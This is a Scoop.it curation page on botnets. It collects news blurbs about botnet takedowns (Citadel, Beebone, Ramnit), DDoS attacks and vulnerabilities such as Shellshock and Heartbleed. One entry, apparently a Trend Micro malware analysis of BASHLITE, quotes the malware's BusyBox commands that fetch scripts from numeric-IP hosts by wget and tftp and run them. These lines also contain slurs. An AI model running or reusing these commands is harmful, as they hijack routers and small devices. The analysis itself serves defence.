Botnets
Follow
Find
661 views | +0 today
 
Scooped by The Historical Cyber Consortium
onto Botnets
Scoop.it!

Microsoft, US feds disrupt Citadel botnet network | PCWorld

Microsoft, US feds disrupt Citadel botnet network | PCWorld | Botnets | Scoop.it
Microsoft and the U.S. Federal Bureau of Investigation have taken aim at a botnet network based on malware called Citadel that is held responsible for stealing people's online banking information and personal identities.
more...
No comment yet.
Your new post is loading...
Your new post is loading...
Rescooped by The Historical Cyber Consortium from ReactNow - Latest News updated around the clock
Scoop.it!

International police operation targets polymorphic Beebone botnet | Europol

The Hague, The Netherlands On 8 April, Europol’s European Cybercrime Centre (EC3) and the Joint Cybercrime Action Taskforce (J-CAT), joined forces w...

Via ReactNow
more...
No comment yet.
Rescooped by The Historical Cyber Consortium from SME Cyber Security
Scoop.it!

Global Cybercrime Group Working To Take Down Major Botnet

Global Cybercrime Group Working To Take Down Major Botnet | Botnets | Scoop.it
Called Beebone, the botnet installs malware on victims' computers without their consent

Via Roger Smith
more...
Roger Smith's curator insight, April 19, 8:41 PM

As fast as they are discovered and disconnected, more command and control systems are born.   The proliferation of Botnets make this a tiresome but very necessary task.  

The work is made harder and more difficult because the cybercriminals use all of the technology we use to ensure our data is safe, including TLS and high end encryption.

Scooped by The Historical Cyber Consortium
Scoop.it!

GitHub Is Back to Normal After Attacks That Were Blamed on China

GitHub Is Back to Normal After Attacks That Were Blamed on China | Botnets | Scoop.it
The U.S. website, GitHub, heavily frequented by coders and other technorati reported on Wednesday that it was operating normally for the first time in several days after attacks blamed on China.
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

GitHub suffers 'largest DDoS' attack in site's history - ZDNet

GitHub suffers 'largest DDoS' attack in site's history - ZDNet | Botnets | Scoop.it
US coding website GitHub is fending off a DDoS onslaught focused on shutting down anticensorship tools.
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

'Energetic' Bear Under The Microscope

'Energetic' Bear Under The Microscope | Botnets | Scoop.it
Kaspersky Lab report finds more industries hit by the infamous cyber espionage campaign -- and evidence pointing to French and Swedish-speaking attackers as well as Eastern European ones.
more...
No comment yet.
Rescooped by The Historical Cyber Consortium from IT Support and Hardware for Clinics
Scoop.it!

More than 1,200 popular Android apps still vulnerable to FREAK - CNET

More than 1,200 popular Android apps still vulnerable to FREAK - CNET | Botnets | Scoop.it
Researchers from FireEye claim the security risks posed by the FREAK bug are far from over.

Via Technical Dr. Inc.
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

Heartbleed, Shellshock and developer apathy let hackers steal a billion ... - V3.co.uk

Heartbleed, Shellshock and developer apathy let hackers steal a billion ... - V3.co.uk | Botnets | Scoop.it
Poor coding and password security makes it too easy for criminals, warns IBM
more...
No comment yet.
Rescooped by The Historical Cyber Consortium from News You Can Use - NO PINKSLIME
Scoop.it!

Europol takedown of Ramnit botnet frees 3.2 million PCs from cybercriminals' grasp

Europol takedown of Ramnit botnet frees 3.2 million PCs from cybercriminals' grasp | Botnets | Scoop.it
In an international operation coordinated with multiple law enforcement and industry partners, Europol led a takedown of the infrastructure of the Ramnit botnet that infected 3.2 million Windows co...

Via #BBBundyBlog #NOMORELIES Tom Woods #Activist Award #Scoopiteer >20,000 Sources >250K Connections http://goo.gl/ruHO3Q
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

The Rebirth of Dofoil

The Rebirth of Dofoil | Botnets | Scoop.it
Dofoil, also known as Smoke Loader, is a modularized botnet that has existed for a few years. Since 2013, we have not received any new variants of this bot and the command-and-control (C&C) servers of its previous variants are no longer accessibl...
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

A Killer Combo: Critical Vulnerability and 'Godmode' Exploitation on CVE-2014-6332

A Killer Combo: Critical Vulnerability and 'Godmode' Exploitation on CVE-2014-6332 | Botnets | Scoop.it
A proof of concept exploit for a Windows vulnerability has recently been published by a Chinese researcher and shows that it’s fairly simple to write malicious VBScript code for attacks for unpatched s
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

Is MS14-066 the Windows Shellshock?

Is MS14-066 the Windows Shellshock? | Botnets | Scoop.it
The latest Patch Tuesday from Microsoft (November 11, 2014) includes fixes for some major vulnerabilities, including remote code execution bugs affecting core Windows components and Internet Explorer.
more...
No comment yet.
Rescooped by The Historical Cyber Consortium from Surfing the Broadband Bit Stream
Scoop.it!

Report: Criminals use Shellshock against mail servers to build botnet

Report: Criminals use Shellshock against mail servers to build botnet | Botnets | Scoop.it
Targeting message transfer agents (MTAs), mail delivery agents (MDAs), and spam filters, criminals are using Shellshock as a means to create botnets.

Via Chuck Sherwood, Senior Associate, TeleDimensions, Inc
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

Facebook Breaks Up Cryptocurrency Mining Botnet 'Lecpetex'

Facebook Breaks Up Cryptocurrency Mining Botnet 'Lecpetex' | Botnets | Scoop.it
Facebook has successfully dismantled a major bitcoin botnet operated by a small team of cyber criminals based in Greece.
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

Lax Security Opens the Door for Mass Scale Abuse of SOHO Routers | Incapsula.com

Lax Security Opens the Door for Mass Scale Abuse of SOHO Routers | Incapsula.com | Botnets | Scoop.it
The attacks we will describe are enabled by what we perceive as particularly careless security practices. Many of these botnet devices remain active, even as this is being written...
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

Puush urges users to change passwords after cyber attack - SC Magazine

Puush urges users to change passwords after cyber attack - SC Magazine | Botnets | Scoop.it
The screen sharing platform Puush was hit by a cyber attack this weekend that injected malware into the server.
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

Compromised WordPress sites launch drive-by attacks off Pirate Bay clone

Compromised WordPress sites launch drive-by attacks off Pirate Bay clone | Botnets | Scoop.it
This Pirate Bay clone is actively pushing the Nuclear exploit kit with an iframe and will infect vulnerable visitors via drive-by download attacks. We've also detected several WordPress sites injected with the same iframe.
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

G DATA: Nested malware builds up botnet

Experts at German security provider G DATA have discovered a number of malware programs that are aimed at building up a botnet and can be controlled using the same Command and Control Server. The two malware instances that the analysts have investigated by way of an example employ significantly different routes to infection. The security experts believe that this attack was planned by one or more perpetrators, distributing the malware en masse so that the botnet can then be sold or rented. The malware distributes itself via macros in manipulated Word documents that are sent as an email attachment. In some cases the fraudsters send a fake rail card invoice. G DATA security solutions detect the malware and prevent the infection.
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

'Energetic' Bear Under The Microscope

'Energetic' Bear Under The Microscope | Botnets | Scoop.it
Kaspersky Lab report finds more industries hit by the infamous cyber espionage campaign -- and evidence pointing to French and Swedish-speaking attackers as well as Eastern European ones.
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

Massive OpenSSL audit hopes to squash Heartbleed-like bugs - GCN.com (blog)

Massive OpenSSL audit hopes to squash Heartbleed-like bugs - GCN.com (blog) | Botnets | Scoop.it
The audit by Cryptography Services will cover a range of security concerns but will focus primarily on the Transport Layer Security stacks, protocol flow, state transitions and memory management.
more...
No comment yet.
Rescooped by The Historical Cyber Consortium from d@n3n
Scoop.it!

The Andromeda/Gamarue botnet is on the rise again

The Andromeda/Gamarue botnet is on the rise again | Botnets | Scoop.it
Attackers use complex multi-stage macro dropper to deliver malware

Via Danen Raas
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

Macro-based malware is making a comeback, researchers warn

Macro-based malware is making a comeback, researchers warn | Botnets | Scoop.it
For the past several months, different groups of attackers have distributed malware through Microsoft Office documents that contain malicious macros, reviving a technique that has been out of style for more than a decade.
more...
No comment yet.
Rescooped by The Historical Cyber Consortium from SSH infosecuration
Scoop.it!

Microsoft SSL bug could be worse than Heartbleed, say researchers

Microsoft SSL bug could be worse than Heartbleed, say researchers | Botnets | Scoop.it
Reseachers say the SSL flaw in most versions of Microsoft Windows could be worse than Heartbleed and Shellshock

Via SSH Communications Security
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

BASHLITE Affects Devices Running on BusyBox

BASHLITE Affects Devices Running on BusyBox | Botnets | Scoop.it
When news of the Shellshock vulnerability broke out at the end of September, we spotted several attacks that leveraged the said vulnerability, thus manifesting the prevalence or even evolution on how attackers used the exploit. For instance, attackers used Shellshock to target SMTP servers, launch botnet attacks, and even to download KAITEN source code among others. We have continuously monitored this vulnerability and on our latest research, we observed that recent samples of BASHLITE (detected by Trend Micro as ELF_BASHLITE.SMB) scans the network for devices/machines running on BusyBox, and logs in using a set of usernames and passwords (see figure 4 below). Once a connection is established, it runs the command to download and run bin.sh and bin2.sh scripts, gaining control over the Busybox system. BusyBox is built on top of the Linux kernel and used by small devices such as routers. Remote attackers can possibly maximize their control on affected devices by deploying other components or malicious software into the system depending on their motive. This is seen in the following commands: cd /tmp busybox wget http://6916337115/.niggers/bin.sh busybox tftp -r bin.sh -g 696337115 sh bin.sh echo -e 'x62x69x6ex66x61x67x74'rn cd /tmp/ busybox wget http://1761025037/.niggers/bin2.sh busybox tftp -r bin2.sh -g 1761025037 sh bin2.sh echo -e 'x62x69x6ex66x61x67x74'rn This means that the malware can do the following commands on the affected devices: Change to the temporary folder where generally there is file write access Download a remote file, depending on whether the shell script is hosted via HTTP or TFTP.  There is ‘fail-safe’ mechanism to achieve its download routine. This means that if in the first command, it doesn’t execute any file, it will try again to connect to the URL and download the file. Run the downloaded shell script. Perform previous “fingerprinting” routine, to check if the device runs on BusyBox. Figure 1. Code snippets of BASHLITE downloading files via BusyBox The previous BASHLITE sample (detected as ELF_BASHLITE.A) used BusyBox just to echo the string 'gayfgt' if the remote malicious user invokes the command SCANNER ON: Figure 2. Scanner mode 'ON' Figure 3. Code snippet of ELF_BASHLITE.A where the string, ‘gayfgt’ is represented in octal form This is done to check if the device runs BusyBox, however it does not execute any commands (unlike the new samples). BASHLITE attempts to log into the remote systems by using the default set of usernames and passwords: Figure 4. Set of usernames and passwords User Impact and Countermeasures Devices running on BusyBox can be possibly affected by BASHLITE. As such, a remote attacker can issue commands or download other files on the devices thus compromising its security.  Since the initial discovery of Shellshock vulnerability, Trend Micro has provided protection via Deep Security rules and Smart Protection Network that detects the exploit and all related malware payload. We strongly advised users to change the default usernames and passwords and disable remote shell if possible to these devices. For more information on Shellshock vulnerability, you can read our Summary of Shellshock-Related Stories and Materials. Users can also get free protection from Shellshock via these tools. The following hashes are related to this threat: ffaa3c714ae82f954089f49828dac795327bf26e e51ad7cc8de05dc7991e591ee2f4eb53b8f05ae4 82e47cdbedeef6812ea84549ffc2f385a03e57de fd5c0f7575e6aa1f9cea5bb3977d6e037bfe6421 With additional insights from Joseph Cepe
more...
No comment yet.
Scooped by The Historical Cyber Consortium
Scoop.it!

Timeline of Sandworm Attacks | Security Intelligence Blog | Trend Micro

Timeline of Sandworm Attacks | Security Intelligence Blog | Trend Micro | Botnets | Scoop.it
What can we learn from the timeline of Sandworm attacks?
more...
No comment yet.